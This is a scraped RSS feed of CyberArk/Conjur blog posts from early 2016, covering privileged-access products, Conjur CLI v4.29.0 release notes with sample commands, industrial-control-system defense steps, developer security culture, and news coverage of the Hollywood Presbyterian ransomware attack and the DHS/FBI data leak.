Leveraging existing identity stores, Conjur uses a tiered authorization model that can facilitate a transparent process for balancing access, risk management, compliance and agility. For instance, the Conjur platform can act as a bastion host that extends the AWS delegation model to grant developer access to the AWS Console, tying access to a specific identity and removing a critical operational bottleneck. The Conjur authorization service can be used to restrict access to only those secrets and SSH keys that developers are authorized to use, with policies based on roles. Developers must authenticate through a set of unique credentials, rather than through a shared password.

For security teams, whose mandate is first and foremost defense, finding their way to enablement for cross-functional processes can be a rocky road. The Conjur approach is to smooth the path through abstracted authorization and well-defined roles for new processes and infrastructure.

 

]]>
Cyber Attackers Have Many Options, Unless You Limit Their Moves https://www.cyberark.com/blog/cyber-attackers-many-options-unless-limit-moves/ Mon, 22 Feb 2016 16:41:50 +0000 https://www.cyberark.com/blog//

If you have read Verizon’s “2015 Data Breach Investigations Report,” you’ll recall the following notable findings:

  • Advanced attacks often start with phishing emails, and a campaign of just 10 emails will typically yield a greater than 90 percent chance that at least one person will become the criminal’s prey.
  • In 60% of cases, attackers are able to compromise an organization within minutes.
  • 75% of attacks spread from Victim 0 to Victim 1 within one day (24 hours).

Another troubling trend is a growing “detection deficit” between attackers and defenders. Attackers who are on a network often have more than 200 days before being discovered.

Remember, privileged accounts are everywhere – in every networked device, database, server, and social media account on-premise and in the cloud. This reality requires new layers of security. Sure, it’s a good idea to educate employees about cyber security risks and best practices, but human error will continue to be a weak link even with best efforts. Behave as if you’ve already been breached. Attackers will find a way in and take actions to escalate privileges until they achieve their goal – whatever it may be. Don’t make it easy for them. Reduce your attack surface with proactive controls and keep an eye on threat analytics for early detection. Our latest graphic offers five steps you can take to limit attackers’ options once they’re inside the network.

]]>
Hollywood Presbyterian Medical Center Breached, Pays Ransom https://www.cyberark.com/blog/hollywood-presbyterian-medical-center-breached-pays-ransom/ Fri, 19 Feb 2016 15:32:00 +0000 https://cyberarkvx2.wpengine.com/blog/hollywood-presbyterian-medical-center-breached-pays-ransom/  

We’ve already discussed Experian’s prediction that healthcare would be a major target for hackers in 2016. In light of recent events, it seems their predictions were correct. Hollywood Presbyterian Medical Center in southern California is the latest organization to fall victim to hackers.

It comes as no surprise that hospitals are a target: they hold very sensitive, and very valuable, patient information. Unlike other industries, healthcare has failed to keep up with the latest IT trends. Yes, hospitals might be using the latest equipment and running the newest and most accurate medical tests; however, their IT systems have not kept pace. With their limited budgets and resources, IT infrastructure is toward the end of the list of things to improve. This lack of attention to infrastructure security has already caused many breaches, including last year’s Anthem breach, and has put patients’ information and wellbeing at risk.

So, what exactly happened at the Hollywood Presbyterian Medical Center? Here’s everything you need to know:

According to the International Business Times, doctors at the hospital had been unable to use their computers to access digital medical records prior to uncovering the breach. The hack is believed to be a ransomware attack.

CSO Online reports that the hospital, which declared the breach an internal emergency, spent over a week off the network, with no digital records or access to email. Due to a lack of access to patient data, some patients were sent to other hospitals. The initial understanding that hackers wanted 9,000 bitcoin (~$3.4 million) to restore the system was false. According to new reports, the hackers only wanted 40 bitcoin (~$17,000).

According to Forbes, the hospital fell victim to the “Locky” virus, ransomware that arrives in an email with an attached Word document. Although the president and CEO of the hospital insisted that the attack didn’t affect patient care, that claim seems pretty far from the truth, as many machines in the hospital did not work, which means a halt in treatment for patients with serious illnesses, including cancer.

NBC reports that the FBI is currently investigating the identity of the hackers. The hospital did pay the ransom in order to obtain the encryption key and resume normal operations.

Although the hospital’s CEO is quick to note that patient information was not leaked, there is still a looming problem. Although no medical data was exposed, the hackers clearly realized that the hospital wasn’t very secure and didn’t have the digital capacity to deal with this situation, knowing that they would eventually get paid. This sets a dangerous precedent for fellow hackers and means more hospitals will be targeted in similar attacks. It is likely that the costs associated with these types of breaches will increase, as hackers are in the ultimate position of power. Additionally, a halt in the hospital’s operations can be potentially life threatening for patients. If the tools doctors and nurses need to use every day to treat patients are unusable, and there is a week-long delay in treatment, this could be potentially devastating.

This breach is even more disturbing than UKM and Anthem because although information was not leaked, hackers disabled the operations of the hospital. Their motivation wasn’t simply to leak information or to make a political statement, it was to get paid. The worse the breach, and the more devastating the effects, the higher the ransom, and the more money these hackers can eventually make. Until the healthcare industry as a whole is given the funding to take cybersecurity more seriously and enlists the help of some security professionals to help get them up to speed, they will continually leave themselves vulnerable. It is crucial that the healthcare industry put greater cybersecurity measures in place to avoid what seems to be an unavoidable abundance of future attacks.

 

]]>
eBook: Achieving Security and Productivity with Least Privilege and Application Control https://www.cyberark.com/blog/achieving-security-and-productivity-with-least-privilege-and-application-control/ Thu, 18 Feb 2016 16:01:42 +0000 https://www.cyberark.com/blog//

The least privilege principle originated in the U.S. Department of Defense in the 1970s, and it was designed to reduce the potential damage of a security breach, whether accidental or malicious, by limiting access and user rights to the lowest levels possible: employees are given the access they need to do their work, but no more. Following this principle, many enterprises have removed local administrator rights from business users on endpoints as a proactive security measure.

Removing local administrator rights from users can reduce security risks, but it can also result in unintended productivity tradeoffs. For example, there may be higher IT Help Desk costs from increased requests by users who need access to necessary business applications and productivity tools. Organizations that opt for the alternative, giving full “Administrator” rights to whoever might need them, often find that business users and IT administrators end up with far more privileges than needed, creating a large and frequently exploited attack surface. In today’s modern business environment, privilege delegation can no longer be approached as an “all or nothing” decision.

We’ve released a new eBook, “Achieving Security and Productivity with Least Privilege and Application Control,” to help organizations better understand and tackle the key challenges associated with securing and managing least privilege and applications running on endpoints and servers. Topics covered include:

  • Thirteen ways that users with administrative rights can cause damage to an organization.
  • Difficult security and productivity trade-offs tied to all-or-nothing privilege delegation.
  • The “privilege creep conundrum.”
  • The correlation between privilege volume and increased insider and advanced threats.
  • The added complexity of endpoints and servers.
  • The ubiquity of malware despite efforts to control applications.
  • The “50 shades of gray” of enterprise applications.

It’s critical to strike the right balance between security and usability to effectively reduce the attack surface while keeping users productive and reducing the burden on IT teams. “Achieving Security and Productivity with Least Privilege and Application Control” also outlines seven recommendations for developing layered security controls – and provides pointers on what to look for when adopting an integrated privilege management and application control solution.

To download the free eBook, please visit: https://www.cyberark.com/resource/achieving-security-and-productivity-with-least-privilege-and-application-control/.

If you are interested in technology that will help your organization to more effectively minimize local administrator privileges and control applications on endpoints and servers, learn more about CyberArk Viewfinity.

Editor’s Note: CyberArk Viewfinity with enhanced protection is now CyberArk Endpoint Privilege Manager.

]]>
6 Blogs Every Security Architect Should be Reading https://www.cyberark.com/blog/6-blogs-every-security-architect-should-be-reading/ Thu, 18 Feb 2016 19:40:00 +0000 https://cyberarkvx2.wpengine.com/blog/6-blogs-every-security-architect-should-be-reading/  

Short on time but still want to stay in the know? We get it. Finding helpful and targeted content isn’t always easy. It’s useful to have a few key resources we can count on for the latest news, productive conversations, and valuable advice. As a security architect, you want to read content that addresses your chief concerns and keeps you up to date with the current industry threats and trends.

The best way to get this information on a regular basis, without tons of reading and researching, is to subscribe to a few different blogs, as they are typically the best resource for getting the news you want in a way that is easy to digest and understand. You might be thinking, this all sounds great, but how do I find these magical treasure troves of content? Great news, we can help you with that. We’ve compiled a short list of informative, security-related blogs to get you started.

Here are 6 blogs every security architect should read.

1) Krebs on Security: You’ve probably already heard of Brian Krebs, but are you a blog subscriber? If not, you should be. Krebs stays up to date with the latest news in internet security and is credited as one of the first to report on the Target breach.

2) IT Security Guru displays all the breaking news the InfoSec community is talking about. The best part: all of the most relevant information is in one spot, so you don’t need to scour multiple news sources for the latest in cybersecurity.

3) An independent news site, Threatpost delivers a plethora of information regarding business and IT security. Through a combination of original stories, aggregated content, and editorials, Threatpost engages readers in discussions about what happened, and why it matters.

4) Schneier on Security is a blog written by renowned security professional Bruce Schneier. Described as a security guru, Schneier is a thought leader in all things security, government, cryptography, and privacy.

5) Naked Security is another well-known blog, and there is a reason why it is so popular. It provides the latest news, opinions, solutions, and discussions on the latest threats and security issues.

6) This isn’t necessarily a blog, but it’s worth a mention as it is super helpful and informative; plus, Reddit allows you to interact with other security and risk professionals with similar issues and concerns. The Information Security News subreddit focuses on real, productive conversations about technical news and information security.

Of course, you should also subscribe to our blog, since we provide helpful information about security and development.

Is there a blog you love to read that isn’t listed here? Leave a link in the comments below so we can check it out!

 

]]>
Practical Steps to Safeguard Critical Infrastructure https://www.cyberark.com/blog/practical-steps-safeguard-critical-infrastructure/ Tue, 16 Feb 2016 13:49:12 +0000 https://www.cyberark.com/blog//

In December 2015, the Department of Homeland Security, the Federal Bureau of Investigation and the National Security Agency (NSA) jointly released a report, “Seven Steps to Effectively Defend Industrial Control Systems” recommending ways to safeguard from cyber-attacks. The release of this report highlights the increased frequency of attempted attacks against Industrial Control Systems and the companies where they are used, specifically in the United States Critical Infrastructure sectors. The Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) noted that 295 incidents were reported in Fiscal Year (FY) 2015.

The recommendations should be taken seriously and implemented promptly. The report warns:

“If system owners had implemented the strategies outlined in this paper, 98 percent of incidents ICS-CERT responded to in FY 2014 and FY 2015 would have been prevented. The remaining 2 percent could have been identified with increased monitoring and a robust incident response.”

With CyberArk solutions, you can address six of the seven recommended steps:

  1. Implement Application Whitelisting (AWL)

Implementing Application Whitelisting in critical, top-hierarchy control computers such as Human Machine Interfaces (HMIs) represents one of the first steps in locking down an Industrial Control System network. CyberArk Viewfinity removes local administrator rights from the HMI, and it seamlessly elevates privileges, based on policy, as required by trusted (whitelisted) applications. This measure helps to mitigate the risk of malware-based attacks.

  2. Reduce Your Attack Surface Area

The isolation of the ICS networks from any untrusted networks is one of the most important steps in safeguarding ICSs given the risks associated with direct connectivity of untrusted end points to ICS assets as well as the potentially devastating impact of an intrusion. Regulations, standards and security experts have advocated this measure as part of a defense-in-depth architecture for many years. The CyberArk Privileged Session Manager secure jump server can isolate sessions connecting to ICS networks, effectively separating users and devices from critical systems, as well as establishing an isolated network segment without the use of a VPN.

  3. Build a Defendable Environment

Network segmentation in ICS helps contain potential damage from a network breach by limiting access to other ICS network segments while allowing authorized communications to continue. The CyberArk Privileged Session Manager secure jump server provides the necessary access control and isolation between network segments and provides an added level of security not available through home-grown or commercially available jump servers. Security measures include individual accountability, access control to target systems, command-level monitoring and keystroke logging, video recording and playback as well as enforcement of established workflow processes.

  4. Manage Authentication (Secure Privileged Accounts)

Privileged credentials allow users to access the organization’s critical systems, including the industrial control system’s computers. When left unsecured, these credentials can be lost, stolen or shared with unauthorized users. The CyberArk Privileged Account Security solution allows customers to secure privileged credentials in a vault and implement controls that prevent the misuse of privileged credentials and alert on suspicious behavior. Additionally, the CyberArk solution allows organizations to add an additional layer of authentication to existing password authentication solutions. It supports various authentication technologies such as LDAP, RSA, SecurID, RADIUS, PKI, smart cards and more.

  5. Implement Secure Remote Access

Remote access allows third-parties (vendors, contractors, consultants, remote employees, etc.) to access the ICS system and other critical assets from outside of the ICS networks. The CyberArk Privileged Session Manager secure jump server provides a central point of control for protecting the ICS networks through the isolation of all sessions originating outside of the ICS network and from unmanaged devices. The jump server protects the ICS target assets in several ways: it blocks the spread of desktop malware, mitigates the risk of credential theft and monitors and records every session.

  6. Monitor and Respond

Monitoring and analytics solutions help organizations to detect malicious activity, while implementing additional measures to quickly respond and mitigate any potential damage or compromise of the asset. CyberArk Privileged Threat Analytics provides both of these capabilities. It helps to detect account and user misuse or compromise and allows incident response or security operations teams to quickly respond to in-progress attacks.

CyberArk is uniquely qualified to help secure Industrial Control Systems from cyber-attacks related to the misuse of privileged accounts. Download “NIST-800-82 Rev 2: Guide to Industrial Control System (ICS) Security” to learn more about how CyberArk can help your organization meet the unique security requirements of Industrial Control Systems.

Editor’s Note: CyberArk Viewfinity with enhanced protection is now CyberArk Endpoint Privilege Manager.

]]>
How to Get Developers on Board with Security https://www.cyberark.com/blog/how-to-get-developers-on-board-with-security/ Tue, 16 Feb 2016 15:31:00 +0000 https://cyberarkvx2.wpengine.com/blog/how-to-get-developers-on-board-with-security/  

Getting developers on board with new security initiatives can be tricky. Developers want to innovate, and since their performance is based on their productivity, security is often viewed as a hindrance that cripples their ability to excel. As the technical landscape has become increasingly aggressive, and enterprises need to keep up with their competition, slowing down isn’t an option.

Data breaches are now commonplace, and it seems that every week more sensitive customer data is left vulnerable. The negative media attention associated with data breaches has finally caught the eye of high-level executives, and they are pushing for change. For the first time in years, security is becoming a mainstay in the business conversation. What does this mean for the security and risk professional? Security is now everybody’s headache. It is your job to make sure that everyone is excited and willing to follow the security best practices that you develop. Sounds easy, right? Well, it isn’t. Security isn’t necessarily a sexy sell, especially when you are trying to sell it to someone whose job is to make cool stuff. However, as security becomes more closely scrutinized, it is crucial that developers get on board. So, how do you get your developers to care about security? Here are 6 tips to get you started.

1. Security Comes From The Top 

Make sure top-level business executives understand how important security is to the success of the organization. Once they understand, have them communicate this importance to the entire organization. They should be talking about security in company-wide meetings and using security terms in internal literature. If high-level executives are painting security as a priority, it will be perceived as such, and will therefore become a point of concern for every person operating in the business. It is one thing to push for greater security as a security and risk professional; however, having security discussed at the very top, among executives that otherwise aren’t involved in the tech side of things, will help to enforce the idea that security is everyone’s responsibility and is a measured benchmark of success for the enterprise.

2. Put your Money Where Your Mouth Is

If you are going to make security part of the developers’ responsibility, you must provide them with the necessary budget for the resources and tools they need to get the job done. If security is a business priority, each department should be given proper budget to allow them to purchase the tools they need to succeed and continue innovating.

3. Create a Well-Thought-Out Security Program

Make sure you engage with developers and create a program that outlines how important security is to the organization, the impact it has on business, and how security can be woven into the development process. Be mindful of the struggles that development will face in learning new tools and changing their processes. With these hurdles in mind, craft proper training for these new tools and set up regular meetings to make sure things are going according to plan. When developing your security program, be sure to include information about recent data breaches that came from vulnerable code; this type of practical, real-world information will be key in getting developers passionate about secure innovation.

4. Understand It’s A Process

As a security and risk professional you must communicate that security is a process with many different pieces; development is one of those pieces.  Therefore, each step in the development process should be made more secure. Have multiple security assessments during the various stages of the development cycle. By re-evaluating at each step, you can easily determine where bugs pop up, come up with ways to lessen those flaws earlier in the process, and better ingrain security in every part of the process.

5. Encourage Accountability

Make sure developers are held accountable for hitting specific security metrics and acting on the security protocols you have put into place. Reward them for their contributions, recognize their successes, and make sure security is part of their yearly evaluations.

6. Talk About It

Encourage developers to communicate with one another, the security team, and other groups within the organization. Promote an open dialogue during which questions, criticisms, and new ideas are equally welcome. Understand that there is no one, perfect security path and that changes will be made each step of the way. Continually reevaluate what is working, and what isn’t, based on the feedback you receive from the dev and security teams. Iterate on these processes until you find the system that works best for your enterprise.

For the security and risk professional, aligning development with security is a difficult, but invaluable, part of the process. Have a pulse on everything that is going on in the organization, including the struggles, pressures, and successes of the development team. Keep in mind that management has made innovation and faster time to market a priority for developers, things that security can very often slow down. However, by making security a priority across the organization, and establishing a more secure enterprise as a benchmark of success, developers will be much more likely to remain vigilant in following the specific security metrics outlined in your program.

 

]]>
New Conjur CLI v4.29.0 Release https://www.cyberark.com/blog/new-conjur-cli-v4-29-0-release/ Thu, 11 Feb 2016 16:28:00 +0000 https://cyberarkvx2.wpengine.com/blog/new-conjur-cli-v4-29-0-release/  

Earlier this week we released a new version of the Conjur CLI. You can download it now from the Conjur developer site.

Conjur CLI v4.29.0 contains many new features and bugfixes. This update takes advantage of several new features in Conjur v4.6.0, also released this week.


Here are the highlights:

Rotate API keys more easily

User and host API keys can now be rotated from the CLI. You no longer need access to a Conjur server to refresh API keys or reset user passwords. New API keys are randomly generated.

$ conjur user rotate_api_key --user vincent.cruz
168cn7m1edk95c343z60m2rgjgaa2b2sz164wg60v1v8jkv92z2h64q

$ conjur host rotate_api_key --host prod/redis/redis004
kynrha2kt3cwedky95t2ere7wfbe0b6333qrf4qv39nhg38sndzp

Set expiration timestamps on variables

Variables can now be set to expire. Once a variable has expired, it can no longer be used and a new value must be added. All expiration events are recorded in the audit log. This feature requires Conjur v4.6.0 or newer.

$ conjur variable expire --days 90 prod/docker-registry/ssl-cert
{
 "id": "prod/docker-registry/ssl-cert",
 "resource_identifier": "conjurops:variable:prod/docker-registry/ssl-cert",
 "expiration/timestamp": "2016-05-09T22:11:32Z"
}

# Show me the variables that expire within the next 100 days
$ conjur variable expirations --days 100
[
 {
  "id": "conjurops:variable:prod/docker-registry/ssl-cert",
  ...
 }
]

Whitelist access to Conjur by IP range

User and host access to Conjur can now be restricted by one or more CIDR ranges. In short, if you set an IP range for a user or host, they can only contact your Conjur environment from that range. CIDR limiting also works with host factory tokens, making them more secure.

# Restrict user access by company subnet
$ conjur user update --cidr 257.32.12.0/32 vincent.cruz
User updated

# Restrict host access by VPC subnet
$ conjur host update --cidr 10.10.1.0/32 prod/redis/redis004
Host updated

# Restrict host factory token usage by VPC subnet
$ conjur hostfactory tokens create --cidr 10.10.1.0/32 prod/redis-factory
[
 {
  "token": "2sp6r1e0zjf0gjqwa01mq7xe9mqtt95nc9f6v6gc7rbbp7rg3",
  "expiration": "2016-02-11T16:52:14+00:00",
  "cidr": [
   "10.10.1.0/32"
  ]
 }
]
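The two restrictions introduced above, variable expiration and CIDR-limited access, combined into one reference check of the kind a secrets server would run before releasing a value. This is an added example, not Conjur’s own code; the record layouts, function names and the sample /24 range are assumptions, and the expiration timestamp is the one shown in the expire command’s output.

```python
"""Added example, not Conjur's code: evaluate CIDR-restricted access and
variable expiration together before a secret is released. Record layouts,
function names and the sample values are assumptions."""
from dataclasses import dataclass, field
from datetime import datetime, timezone
from ipaddress import IPv4Network, IPv6Network, ip_address, ip_network
from typing import List, Optional, Tuple, Union

Network = Union[IPv4Network, IPv6Network]


@dataclass
class Principal:
    """A user or host record; an empty CIDR list means unrestricted."""
    id: str
    cidrs: List[Network] = field(default_factory=list)


@dataclass
class Variable:
    """A secret with an optional expiration (timezone-aware UTC datetime)."""
    id: str
    expiration: Optional[datetime] = None


def parse_cidrs(values: List[str]) -> List[Network]:
    """Validate CIDR strings when the policy is updated, not at request time.
    strict=True rejects host bits set below the mask (10.10.1.5/24), and
    ip_network rejects any octet above 255, so a typo such as 257.32.12.0/32
    raises ValueError instead of silently locking out, or admitting, everyone."""
    return [ip_network(v, strict=True) for v in values]


def source_allowed(principal: Principal, client_ip: str) -> bool:
    """True when the request source lies inside one of the principal's ranges."""
    if not principal.cidrs:
        return True
    addr = ip_address(client_ip)
    return any(addr in net for net in principal.cidrs)


def variable_usable(var: Variable, now: datetime) -> bool:
    """An expired variable can no longer be read until a new value is added."""
    return var.expiration is None or now < var.expiration


def authorize_fetch(principal: Principal, var: Variable,
                    client_ip: str, now: datetime) -> Tuple[bool, str]:
    """Apply both checks and return (allowed, reason) for the audit log.
    The source check runs first so a request from outside the allowed range
    learns nothing about whether the variable exists or has expired."""
    if not source_allowed(principal, client_ip):
        return False, "source_ip_not_in_cidr"
    if not variable_usable(var, now):
        return False, "variable_expired"
    return True, "ok"


def at(year: int, month: int, day: int) -> datetime:
    """Constructed clock value for the demo (midnight UTC on the given day)."""
    return datetime(year, month, day, tzinfo=timezone.utc)


# Constructed sample records using the release note's names; the /24 range is
# an assumption, the timestamp is the one printed by `conjur variable expire`.
REDIS_HOST = Principal("prod/redis/redis004", parse_cidrs(["10.10.1.0/24"]))
SSL_CERT = Variable("prod/docker-registry/ssl-cert",
                    datetime(2016, 5, 9, 22, 11, 32, tzinfo=timezone.utc))

if __name__ == "__main__":
    print(authorize_fetch(REDIS_HOST, SSL_CERT, "10.10.1.7", at(2016, 2, 11)))
    print(authorize_fetch(REDIS_HOST, SSL_CERT, "192.168.0.5", at(2016, 2, 11)))
    print(authorize_fetch(REDIS_HOST, SSL_CERT, "10.10.1.7", at(2016, 6, 1)))
```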

Check server health and version info

You can now check the health of any node in your Conjur environment from the CLI (and API). Conjur service version information is now available as well.

# Checking the health of the Conjur master
$ conjur server health
{
 "services": {
  "host-factory": "ok",
  "pubkeys": "ok",
  "authn": "ok",
  "audit": "ok",
  "core": "ok",
  "authz": "ok",
  "ldap": "ok",
  "expiration": "ok",
  "ok": true
 },
 "database": {
  "ok": true,
  "connect": {
   "main": "ok"
  },
  "replication_status": {
   "pg_current_xlog_location": "0/1E3E6A0",
   "pg_current_xlog_location_bytes": 31712928
  }
 },
 "ok": true
}

# View the installed version of the CLI and Conjur server
$ conjur version
Conjur client version 4.29.0
Conjur appliance version: 4.6.0-200-g84ad06c
Conjur service versions:
 audit: 4.6.0-21-g2235f6e
 authn: 4.6.0-40-ge3e4255
 authn-ldap: 0.4.0-9-gf70b32e
 authn-tv: 4.6.0-38-ge4df928
 authz: 4.6.0-5-gdd22bca
 cli: 4.29.0-dev-94-ga4757fe
 core: 4.6.0-15-gfa546f0
 evoke: 4.7.1-30-g9b17039
 expiration: 0.2.1-50-g0ca4bde
 host-factory: 4.6.0-47-gaf3b9a1
 ldap-server: 4.6.0-19-ga7002c9
 pubkeys: 4.6.0-7-g0ca60a4

View the CHANGELOG on GitHub for a full list of changes. The CLI reference page contains full details for each new command. All new features also have corresponding routes in the Conjur API.

Download the new CLI, try it out, and let us know what you think!

 

]]>
The FBI and Department of Homeland Security Breached https://www.cyberark.com/blog/the-fbi-and-department-of-homeland-security-breached/ Wed, 10 Feb 2016 18:04:00 +0000 https://cyberarkvx2.wpengine.com/blog/the-fbi-and-department-of-homeland-security-breached/  

After the OPM breach, you would assume the government immediately took measures to make sure there wasn’t a second hack. It looks like whatever efforts they made didn’t work, because they were breached yet again. The names, titles, phone numbers, email addresses, and job descriptions of thousands of FBI employees were leaked. But wait, it gets worse. Similar information was also breached for 9,000 homeland security workers just the day before. Luckily, the government has impeccable timing, as the breach hasn’t gotten much press, largely overshadowed by President Obama’s announcement of his Cybersecurity National Action Plan.  

Here’s everything you need to know about the breach:

The hackers compromised a Justice Department staffer’s email account and released the information on Super Bowl Sunday and the following Monday, as they had promised to do on social media.

According to US News, the hackers appear to have significant political motivations. The group tweeted that they would continue to release the information they took until there is a free Palestine, urging the U.S. to end diplomatic relations with Israel. They also tweeted 

The same hackers released the information of 9,000 DHS employees and 20,000 FBI workers. The message on top of the data dump reads “Long Live Palestine, Long Live Gaza”. The Department of Justice has stated that, as of now, it doesn’t look like any sensitive identifiable information was breached. The hackers also claim that they have access to hundreds of gigabytes of DOJ data, which they are waiting to release.

The pro-Palestine hacker group taking credit for the attack is called “DotGovs”. The group has been very active on Twitter, typically using #FreePalestine in their tweets. Following the breach they tweeted, “When will the US government realize we won’t stop until they cut relations with Israel.”

Government officials have commented on the breach and are working to make it seem unimportant, comparing the leaked information to what you could find in an old phone book. However, it should be noted that while some of the information was out of date, other information was extremely accurate. 

Additional thoughts…

It seems that the most perplexing, and worrisome, aspect of this hack is that the government is acting like it isn’t a very big deal. You would think that following the OPM breach and the announcement of the President’s new cybersecurity plan, they would use this cyberattack as a catalyst to move the plan forward, instead of painting it as a non-issue. The media, mostly concentrating on the announced cybersecurity plan, seems to have forgotten about this breach, as reporting has been lax.

The scary part of this breach isn’t necessarily the content that was released, but rather, the response and the fact that it occurred in the first place. The OPM breach was devastating, exposing 25.7 million records. Following this attack, putting basic information security fundamentals in place should have been top priority.

It is very dangerous for DOJ officials to portray this breach as insignificant. There is still a large amount of unknown data that the hackers allegedly possess, data that poor information security practices allowed them to access. The government must take these events more seriously. Hackers will continue to work to breach the government, and soon, as we have seen in the past, more than just names and email addresses will be compromised.

This breach should be used as a conversation starter to put more secure practices in place. As the presidential election continues to heat up, and international struggles move forward, we are more vulnerable than ever to hackers trying to access sensitive data for political gain. Hopefully this newly released cybersecurity plan will spark more conversations around security, help ensure that information is more closely protected, and lessen the likelihood of cyberattacks in the future.

 

]]>
Conjur to Exhibit at RSA 2016 https://www.cyberark.com/blog/conjur-to-exhibit-at-rsa-2016/ Tue, 09 Feb 2016 15:39:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-to-exhibit-at-rsa-2016/  

On February 29th we will depart cold, snowy Boston and head to warm and sunny San Francisco. We are very excited to attend RSA Conference 2016 with our friends at SSH Communications Security. You can find us at their booth in the South Expo Hall, chatting about our recent partnership with the creator of the SSH protocol and discussing how you can better manage access control for your automated infrastructure.

We are so excited about our partnership with SSH, as Conjur will become integrated with their CryptoAuditor and UKM products. Working with SSH’s CryptoAuditor encrypted channel monitoring solution, Conjur can operate in any elastic cloud environment via a lightweight deployment while maintaining its regular flexibility and ease of use. Additionally, Conjur will secure the connection from UKM to the hosts, and the lockdown will eliminate the need to manage authorized keys on each box going forward.

Will you be at RSA? Conjur CEO Elizabeth Lawler and VP Josh Bregman will be there along with business development representative Wes Davis. To set up some time to chat with them, just click here.

Forgot to register? Don’t worry, there are still passes available. Sign up before they sell out and everyone decides to head to the West Coast and escape the snow.

 

]]>
Give Internal Stakeholders Reasons to Make Security Personal https://www.cyberark.com/blog/give-internal-stakeholders-reasons-make-security-personal/ Mon, 08 Feb 2016 14:49:02 +0000 https://www.cyberark.com/blog//

It’s not unusual for privileged users themselves to be the most resistant cohort when it’s time to improve privileged access controls, and it’s easy to understand why. Without access to administrative privileges, IT administrators and database administrators (DBAs) may be unable to carry out certain tasks or use certain applications needed for their day-to-day roles. Many IT administrators, for example, believe they could do their job better with unfettered access and freedom to choose their own tools. They may view additional steps or restrictions as a burden. To address user objections related to implementing privileged access controls, it’s important to focus on communicating and contextualizing privileged account security.

Jay Leek, CISO of The Blackstone Group, stressed the importance of effective communications in a CSO article, noting that security professionals need to change how they talk about key issues: “If you can’t communicate effectively about what you’re doing, people are going to duck when they see you coming because you’re not making any sense… Your ability to articulate what their role is and why it’s important to the organization in a way they can understand is the only way to change organizational behavior.” He continued, “You have to align what you do and change the conversation to something that’s more meaningful to people outside of the security organization.”

When communicating internally with stakeholders, create messages that help them to understand how improving security controls will help them personally. For example, challenge the traditional perceptions around productivity loss. Demonstrate that the recommended security practices can actually streamline tasks and make how they operate with credentials more efficient – with benefits such as single sign-on and less tedious password changes.

Jim Motes, CISO of Rockwell Automation, notes in the CISO View report, “An advantage IT admins can really understand is nonrepudiation.” He continues, “Explain to them, for shared accounts, if we’re able to track exactly who is doing what and when, if something goes wrong with an account, you won’t be a suspect. For investigations, we’ll have a forensic trail to know it was definitely not you.” Also in the report, panelists explain that IT administrators are in a position of high trust within the organization, but often haven’t completely thought through the ramifications or how they would respond if their account was used inappropriately. Helping them to understand this highlights the critical need to make changes.

To be successful in improving privileged access controls, it’s important for the CISO and security team to focus on organizational culture and to help people navigate through the change curve. Above all, stakeholders need to have a sense of ownership in order for the program to be effective. Request their input and then incorporate it into the plans. Make sure the people who follow the new processes get a chance to review them ahead of time.

I found this chapter of the eBook particularly interesting. As a CISO, I’m sure you hear a lot about strategies for communicating with and winning over executives. Communications is an important part of the execution and success of a security program, so it’s also important to win the support of IT administrators and DBAs. For those interested in a more in-depth read on this topic, download the free CISO View report here.

]]>
4 Ways Technology Has Changed the Financial Services Sector https://www.cyberark.com/blog/4-ways-technology-has-changed-the-financial-services-sector/ Wed, 03 Feb 2016 17:36:00 +0000 https://cyberarkvx2.wpengine.com/blog/4-ways-technology-has-changed-the-financial-services-sector/  

The emergence of new technologies has most certainly had an effect on business. For many industries, new technology has drastically changed enterprise operation and structure. The financial services industry has been largely affected by the digital age. Although new technologies and the shift toward the cloud have made things easier, and have allowed these companies to operate on a scale that is otherwise unattainable, the shift does come with its own set of issues.

Here are 4 Ways Technology has Shaped the Financial Services Sector.

1. Virtual, Not Physical, Data 

Years ago, banks were concerned with securing their physical data: guarding servers and tangible files filled with personal and sensitive data. This worry has shifted, as data is largely virtual. Of course, management at individual branches is worried about the occasional break-in. But enterprises as a whole are more concerned about large-scale attacks, as the dollar amount of a cyberattack on the entire institution is potentially devastating. Automation has changed almost every aspect of financial services. Banks have computerized tellers, digital records, electronic payments, etc., and all of this data can be sent across the world with the click of a button. Banks store and have access to a plethora of personal information. Not only do they deal with people’s money, but they also hold a great deal of sensitive, identifiable information, so when a financial enterprise is hacked, a lot more than money is at stake.

2. It’s Gone Global

Technology has changed the industry completely and has introduced some new key players. Now, banks can operate across the world, the cloud making it possible to share information anywhere and everywhere. In recent years, new financial hubs have emerged, as business can now be conducted globally. As more players enter the space, there is an increase in the size of infrastructures and IT teams, an increase in the amount of data that is shared, and an increase in the surface area that is vulnerable to attacks.

3. Security is Everyone’s Problem 

Security has become an enterprise-wide concern. Years ago, the only people truly worried about security were the people who worked in the server room. Things are different now. As the vast amount of data the financial services industry stores is highly sensitive, and can be easily shared internally and accessed by hackers, security needs to be prevalent in every single aspect of the business. The financial services sector is now concerned with both insider and outsider threats. As hackers have become increasingly stealthy and resourceful, enterprises must make sure their security is robust enough to thwart their efforts.

4. The Internal Hierarchy has Shifted 

The IT team has become just as important as financial experts in the financial services industry. This is especially true as more and more companies make the transition to the cloud. These enterprises need large IT teams to manage data and keep up with current trends. The digitization of the industry means that enterprises are able to move fast, innovate, and create new and exciting features. Having large, agile IT teams is crucial to a financial institution’s success in this new, more competitive marketplace.

Hackers have become smarter and more determined, and if enterprises don’t take security seriously, they are at risk of a breach. The financial services industry has a lot more at stake than other types of businesses. Unlike retailers, a bank’s main job is to hold our most personal information and keep it safe. Thus, a breach would be devastating in this industry, as consumer trust would likely decline drastically if their sensitive financial information was compromised. Keep in mind, we aren’t just talking about individuals who utilize these finance firms, but also large corporations. Losing these customers due to a cybersecurity issue would be overwhelming.

These four changes reveal how important infrastructure security has become for financial services. Although the cloud has allowed these corporations to operate on a much larger scale, and these new capabilities have brought an increase in revenue, it does come with a price. Although enterprises can handle more data, they need to be able to effectively secure it and avoid the public nightmare that is a data breach.

 

]]>
Wendy’s Customers: Keep an Eye On Your Bank Statements https://www.cyberark.com/blog/wendys-customers-keep-an-eye-on-your-bank-statements/ Tue, 02 Feb 2016 17:36:00 +0000 https://cyberarkvx2.wpengine.com/blog/wendys-customers-keep-an-eye-on-your-bank-statements/  

Need another reason to put down the burger and stick with your New Year’s resolution? Looks like adhering to that healthy eating plan has gotten a lot easier. Wendy’s recently announced that they might have fallen victim to a credit card breach. They are still investigating the incident and aren’t sure if the situation is contained or if credit cards are still vulnerable.
